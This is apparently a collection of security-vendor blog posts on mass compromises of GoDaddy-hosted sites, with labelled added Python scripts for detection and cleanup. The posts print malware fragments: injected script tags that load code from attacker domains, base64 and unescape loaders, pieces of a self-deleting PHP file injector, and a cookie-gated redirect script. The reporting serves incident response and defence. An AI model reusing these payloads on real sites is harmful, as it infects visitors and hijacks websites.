GoDaddy shared servers compromised – .htaccess redirection to sokoloperkovuskeci.com

We are seeing many sites hosted on GoDaddy shared servers getting compromised today (and for the last few days) with a conditional redirection to sokoloperkovuskeci.com. This is what it looks like on our scanner:

Suspicious conditional redirect.
Details: http://sucuri.net/malware/entry/MW:HTA:7
Redirects users to:http://sokoloperkovuskeci.com/in.php?g=1105

This is caused by this entry that is added to the .htaccess file of the compromised sites:
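The rule itself is not reproduced in this excerpt. As an added example (not code from the original post or from Sucuri), the following Python check flags the shape a suspicious conditional redirect takes in mod_rewrite: a RewriteRule whose target is an off-site URL, preceded by RewriteCond lines that key on the visitor's referer or user agent. The .htaccess text is constructed for the example; only the destination host comes from the scanner output above.

```python
import re

# Constructed sample .htaccess: a normal WordPress block followed by a rule of the
# kind a conditional-redirect signature would flag (host taken from the scanner output).
SAMPLE_HTACCESS = """\
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
# END WordPress
RewriteCond %{HTTP_REFERER} (google|yahoo|bing)\\. [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (msie|firefox|chrome) [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=1105 [R=302,L]
"""

COND = re.compile(r"^\s*RewriteCond\s+%\{(\w+)\}\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)
EXTERNAL = re.compile(r"^https?://([^/]+)", re.I)
# Server variables that make a redirect depend on who the visitor is.
VISITOR_VARS = {"HTTP_REFERER", "HTTP_USER_AGENT", "REMOTE_ADDR", "HTTP_COOKIE"}

def find_conditional_redirects(text, own_hosts=()):
    """Return (line_no, target_host, visitor_vars) for every RewriteRule that sends
    visitors off-site, with the visitor-dependent RewriteCond variables guarding it."""
    findings, pending = [], []
    for n, line in enumerate(text.splitlines(), 1):
        c = COND.match(line)
        if c:
            pending.append(c.group(1).upper())
            continue
        r = RULE.match(line)
        if r:
            host = EXTERNAL.match(r.group(1))
            if host and host.group(1).lower() not in own_hosts:
                findings.append((n, host.group(1), sorted(set(pending) & VISITOR_VARS)))
            pending = []  # RewriteCond lines only apply to the next RewriteRule
    return findings
```

A hit with an empty variable list is an unconditional off-site redirect; a non-empty list is the conditional form the scanner reports.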


Database injection and lessthenaminutehandle.com – Intermediary domains

We posted a few days ago about a large scale database injection attack affecting shared hosts. The infected sites got the following javascript malware inserted on every post of their database (generally the wp-post table on WordPress):

<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B"..

Which after decoded, attempted to include and load the following link: lessthenaminutehandle.com/js.php?kk=33

Nothing much different from other web-based malware that we have been tracking. But what is interesting about this attack is how fast the intermediaries domains are changing to avoid detection and getting blacklisted.

These are just some of the ones used in the last 24 hours:


The domains used in the last 24 hours rotated across .cc, .co.cc, .in, .rr.nu and even some .com TLDs. Most of them are hosted at 46.252.130.200, but the IP address is changing as well. Checking them against Google's blacklist, none of them are listed, which shows that their tactics are working.

We will keep posting details as we learn more.


If your site is infected with malware or blacklisted, we are here to help.

Database injection, Hilary Kneber and lessthenaminutehandle dot com

We posted a few weeks ago about a database injection attack that infected thousands of WordPress blogs on shared hosts. At that time, the attackers were inserting a javascript link pointing to welcometotheglobalisnet.com/js.php?kk=25 in all the posts in the database.

Today, we started to detect that a large number of those sites are being reinfected (and a bunch of new ones are getting hacked too) with a very similar malware string. The major difference is this time the links are pointing to http://lessthenaminutehandle.com/js.php?kk=33 (both hosted at 91.193.194.110).

This hack also injects the malware on every post in the database, but this time encoded as:

<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B"..
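Both posts quote the same truncated eval(unescape(...)) string. As an added example (not from the original posts or from Sucuri), this Python helper percent-decodes such a payload, pulls out the loader URL it writes into the page, and strips the tag from a post body. The sample rows are constructed to stand in for wp_posts, and the full encoded string is assumed to decode to a document.write of the js.php?kk=33 loader, which is consistent with the visible head ("document.wr") and tail (p?kk=33"></script>');) of the quoted string.

```python
import re
from urllib.parse import unquote

# Constructed: the assumed full payload behind the truncated string in the post.
LOADER = 'document.write(\'<script src="http://lessthenaminutehandle.com/js.php?kk=33"></script>\');'
ENCODED = "".join("%%%02X" % ord(c) for c in LOADER)
# Constructed rows standing in for (ID, post_content) from wp_posts.
SAMPLE_POSTS = [
    (1, "Hello world post body.<script>eval(unescape(\"" + ENCODED + "\"))</script>"),
    (2, "A clean post with no injection."),
]

EVAL_UNESCAPE = re.compile(r'<script>\s*eval\(unescape\("([^"]+)"\)\)\s*</script>', re.I)
SRC_URL = re.compile(r'src=["\']?(https?://[^"\'\s>]+)', re.I)

def decode_payload(encoded):
    """Recover the JavaScript that unescape() would hand to eval()."""
    # JavaScript unescape() also accepts %uXXXX; expand those before percent-decoding.
    encoded = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), encoded)
    return unquote(encoded)

def loader_urls(js):
    """Every external script URL the decoded JavaScript tries to load."""
    return SRC_URL.findall(js)

def scan_posts(rows):
    """Return (post_id, matched tag, loader URLs) for each injected post."""
    findings = []
    for post_id, content in rows:
        for m in EVAL_UNESCAPE.finditer(content):
            findings.append((post_id, m.group(0), loader_urls(decode_payload(m.group(1)))))
    return findings

def clean_content(content):
    """Post body with every eval(unescape(...)) script tag removed."""
    return EVAL_UNESCAPE.sub("", content)

if __name__ == "__main__":
    for post_id, _, urls in scan_posts(SAMPLE_POSTS):
        print(f"post {post_id}: loads {urls}")
```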


Hilary Kneber Strikes Again – welcometotheglobalisnet

It seems that after a few quiet months, the “Hilary Kneber” group is back at it again. Their latest approach is very typical of Hilary Kneber style attacks affecting GoDaddy shared hosts: they modify every PHP file and the database to make sure every page on the infected site loads malware.

Today, we’ve started to see various WordPress sites infected with the following malware:

<script src="http://welcometotheglobalisnet.com/js.php?kk=25"></script>

Update 1: We are seeing some Vbulletin forums with the database infected. So it is not restricted to WordPress.
Update 2: If you need help cleaning up your site, we can do it for you: http://sucuri.net/signup

This tag is injected into every post in the WordPress database, and all PHP files are modified to generate the same code. Note that the domain is not blacklisted yet, so the risk is very high for everyone visiting an infected site.

What happens when someone visits an infected site?

What the malware does is very simple: it contacts a few domains:


Attacks against GoDaddy – acrossuniverseitbenet + Hilary Kneber + HardSoft

For the last few days we’ve been tracking another large scale attack against GoDaddy shared-hosted sites. GoDaddy has been a target for a while, with mass infections happening often.

This time, the attackers changed tactics and instead of infecting the PHP files, they injected malicious code inside the database. On the WordPress infected sites, they added the following javascript inside every post (on the wp_posts table):

<script src="http://acrossuniverseitbenet.com/js.php?kk=10"></script>

As you can imagine, this javascript redirects the user to the infamous “Fake AV” pages:


Attacks on GoDaddy sites – insomniaboldinfoorg.com

UPDATE: As of 4AM Pacific, on November 3rd, we’ve received various reports of another related outbreak of exploited sites on GoDaddy. We’re currently researching the issue and will provide updated scripts if necessary. Please comment below if you have been affected, or if you have any information on the exploit.


Just a quick update to this blog post: More Attacks – insomniaboldinfocom.com.

We posted a few days ago that attackers were using insomniaboldinfocom.com to spread malware to multiple web sites. Today, they changed domains and are targeting GoDaddy sites using insomniaboldinfoorg.com.

The following domains/IP addresses are being used to spread the attack:

http://insomniaboldinfoorg.com/ll.php?k=1

www3.hope-soft57.net
www3.new-protectionsoft23.in
www4.free-pc-protection9.in

http://insomniaboldinfocom.com/mm.php

http://insomniaboldinfonet.com/mm.php

www3.large-defense1.in


GoDaddy sites hacked – myblindstudioinfoonline.com and Hilary Kneber

We can now confirm there is an undetermined number of sites hosted at GoDaddy that have been attacked and exploited. Our research is showing this is an ongoing issue that started within the last couple hours.

All the sites we’ve seen so far contain the following javascript added to all PHP files:

<script src="http://myblindstudioinfoonline.com/ll.php"

These are generated by a very long eval(base64_decode( line:

eval(base64_decode("aWYoZnVuY3Rpb....

Here is the malware entry our scanner is detecting:


Here we go again – Problem at GoDaddy continues

Update from GoDaddy: fewer than 200 accounts were hacked this morning, as they were able to contain it before it spread. In their own words:

Compromised Website Update 5/20/10 – An attack impacting less than 200 accounts happened this morning.

Go Daddy is working with other top hosting providers and security experts to gather information to stop the criminals initiating these exploits.

We have contacted the malware site registrar to remove the offending domain from the Internet, in order to block the attack.

As part of our investigation, Go Daddy has launched a fact-finding tool to collect information about your experience. If you suspect your site was impacted, please fill out our security submission form, located here – http://www.godaddy.com/securityissue.

Thank you, Todd Redfoot, Chief Information Security Officer

Original post: Yes, this is serious. GoDaddy has not fixed their problems yet. Just a few hours ago, we started to notice A LOT of sites reinfected with the “losotrana” malware.

Found code used to inject the malware at GoDaddy

Update: Reply from GoDaddy: http://blog.sucuri.net/2010/05/reply-from-godaddy-regarding-latest.html

While GoDaddy was busy blaming its users, one of our friends, Kevin Reville, got tired of getting hacked and set up a cron script to monitor his site and alert him when new files were added.

What did he find? He found the malware used by the attackers to infect everyone.

Just to be clear: Nothing to do with WordPress. In fact, in one site we were monitoring, nothing got logged related to WordPress, except this script being called and then deleted. We also saw Joomla sites getting hacked and many other web applications.

So what is going on? The attackers are able to create this single PHP file on all the sites and then remotely execute it to infect everything. Once it is done, the script deletes itself.
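As an added example (not Kevin's script, which the post does not reproduce), here is a Python version of the same idea: hash every file under the site root, keep the manifest outside the web root, and on each cron run report files that appeared, changed or vanished. The site contents in demo() are constructed.

```python
import hashlib
import json
import os
import tempfile

# Added example (not Kevin's script); assumes the manifest JSON lives outside the web root.
def hash_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_manifest(root):
    """Map each file's path (relative to root) to its SHA-256 digest."""
    manifest = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = hash_file(full)
    return manifest

def diff_manifests(old, new):
    """Return (added, modified, removed) relative paths between two manifests."""
    added = sorted(p for p in new if p not in old)
    removed = sorted(p for p in old if p not in new)
    modified = sorted(p for p in new if p in old and old[p] != new[p])
    return added, modified, removed

def check_site(root, manifest_path):
    """One cron run: diff the tree against the stored manifest, then store the new one."""
    old = {}
    if os.path.exists(manifest_path):
        with open(manifest_path) as f:
            old = json.load(f)
    new = build_manifest(root)
    with open(manifest_path, "w") as f:
        json.dump(new, f)
    return diff_manifests(old, new)

def demo():
    """Constructed site: baseline run, then a dropped PHP file shows up as added."""
    root, manifest = tempfile.mkdtemp(), os.path.join(tempfile.mkdtemp(), "manifest.json")
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php echo 'hi';")
    check_site(root, manifest)  # first run only records the baseline
    with open(os.path.join(root, "simple_production.php"), "w") as f:
        f.write("<?php /* dropped file */")
    return check_site(root, manifest)
```

In a cron job, any non-empty "added" or "modified" list is the alert condition; a file that appears and then deletes itself between two runs is missed, so the interval should be short.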

Analysis:

The script in this situation was called “simple_production.php” (but we heard reports of different names being used). It is a base64-encoded file that looks like this: (see it in full at MW:SIPRO:1)

eval(base64_decode("DQpzZXRfdGltZV9saW1pdCgwKTsNCg0KDQpmdW5jdGlvbiBpbmplY3....

Decoded, this is what it does: (see the full content here)

1-First, it removes itself:

$z=$_SERVER["SCRIPT_FILENAME"];
@unlink($z);

2-Encodes the javascript:

$cod=base64_encode('< script src="http://holasionweb.com/oo.php">
$to_pack='if(function_exists(\'ob_start\')&&!isset($GLOBALS[\'mr_n..

3-Scans all directories and adds the malware to all PHP files. After that, it prints the number of infected files and exits:

$val=dirname($z);
$totalinjected=0;
echo "Working with $val\n";
$start_time=microtime(true);
if ($val!="")inject_in_folder($val);
$end_time=microtime(true)-$start_time;
echo "|Injected| $totalinjected files in $end_time seconds\n";

So a simple PHP script is doing all this mess. The open question is how they are able to drop this file on all those sites at GoDaddy. Permissions on most of the sites we checked were correct. It is not a web application bug. What is left is an internal problem at GoDaddy.

If you are a GoDaddy customer that got hacked, send this link to them. Let’s hope for a good response this time.

As always, if you are having difficulties getting your site cleaned up, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Second round of GoDaddy sites hacked

It seems that a second round of attacks is happening today at GoDaddy, infecting all kinds of sites (Joomla, WordPress, etc.). Looking at the modification dates on the files, they all happened May 1st (today) during the morning, from 1 to 3/4 am.

All of them had the following javascript added to their pages:

script src= http://kdjkfjskdfjlskdjf.com/kp.php

Which looks very similar to the attacks from the last few weeks, but this time using kp.php instead of js.php. Also, many sites that were not infected during the previous batch got hacked now.

This is what the kp.php file looks like:

function setCookie(c_name, value, expiredays) {
  var exdate = new Date();
  exdate.setDate(exdate.getDate() + expiredays);
  document.cookie = c_name + "=" + escape(value) +
    ((expiredays == null) ? "" : ";expires=" + exdate.toGMTString());
}
function getCookie(c_name) {
  if (document.cookie.length > 0) {
    c_start = document.cookie.indexOf(c_name + "=");
    if (c_start != -1) {
      c_start = c_start + c_name.length + 1;
      c_end = document.cookie.indexOf(";", c_start);
      if (c_end == -1) c_end = document.cookie.length;
      return unescape(document.cookie.substring(c_start, c_end));
    }
  }
  return "";
}
// Cookie gate: each visitor is redirected only once every 20 days.
var name = getCookie("pma_visited_theme1");
if (name == "") {
  setCookie("pma_visited_theme1", "1", 20);
  var url = "http://www3.workfree36-td.xorg.pl/?p=p52dcWpkbG6Hnc3KbmNToKV1iqHWnG3KXsWYlGhnZWuVmA%3D%3D";
  window.top.location.replace(url);
} else { }

As you can see, very similar to the previous attack, also loading malware from this *.xorg.pl domain…

If your site got hacked, open your index files and look for this string at the top of them:

< ?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYha
XNzZXQoJEdMT0JBTFNbJ2..

Removing that from all your index files should solve the problem.

If you are using WordPress, all the *.php files inside your themes folder got modified. So, you have to clean them too.
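The injector described in the earlier post walks the tree and prepends that eval(base64_decode(...)) statement; the cleanup above reverses it by hand. As an added example (not Sucuri's tooling), this Python script does both steps for a whole themes folder: it finds .php files that start with the injected statement, confirms the base64 decodes to the ob_start loader quoted above, and strips it. It assumes the injection is a single prepended `<?php /**/ eval(base64_decode("...")); ?>` statement; the files in demo() are constructed.

```python
import base64
import os
import re
import tempfile

# Added example, not Sucuri's cleanup script. It assumes the injected code is one
# <?php /**/ eval(base64_decode("...")); ?> statement prepended to each PHP file.
INJECT = re.compile(r'^<\?php\s*/\*\*/\s*eval\(base64_decode\("([A-Za-z0-9+/=]+)"\)\);\s*\?>\s*')
KNOWN_PREFIX = b"if(function_exists('ob_start')"

def is_known_payload(b64):
    """True when the base64 decodes to the ob_start loader quoted in the post."""
    try:
        return base64.b64decode(b64).startswith(KNOWN_PREFIX)
    except ValueError:
        return False

def scan_tree(root):
    """List (relative path, known payload?) for every .php file carrying the injection."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in (n for n in names if n.endswith(".php")):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as f:
                m = INJECT.match(f.read())
            if m:
                hits.append((os.path.relpath(path, root), is_known_payload(m.group(1))))
    return hits

def clean_file(path):
    """Strip the injected statement in place; return True if something was removed."""
    with open(path, encoding="utf-8", errors="replace") as f:
        text = f.read()
    m = INJECT.match(text)
    if not m:
        return False
    with open(path, "w", encoding="utf-8") as f:
        f.write(text[m.end():])
    return True

def demo():
    """Constructed theme folder: one injected and one clean file; scan, clean, rescan."""
    root = tempfile.mkdtemp()
    payload = base64.b64encode(b"if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){}").decode()
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write('<?php /**/ eval(base64_decode("' + payload + '")); ?>\n<?php get_header(); ?>')
    with open(os.path.join(root, "footer.php"), "w") as f:
        f.write("<?php wp_footer(); ?>")
    before = scan_tree(root)
    cleaned = [clean_file(os.path.join(root, p)) for p, _ in before]
    return before, cleaned, scan_tree(root)
```

A hit whose second element is False still matches the injected shape but carries a different payload, so inspect it before stripping; back up the tree before running clean_file in anger.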

UPDATE 1 – People are starting to complain on the WordPress forums: http://wordpress.org/support/topic/394255.

UPDATE 2 – A tweet about it claimed that it is related only to WordPress. It is affecting all platforms there.

As always, if you need help to recover from a malware/hacking attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.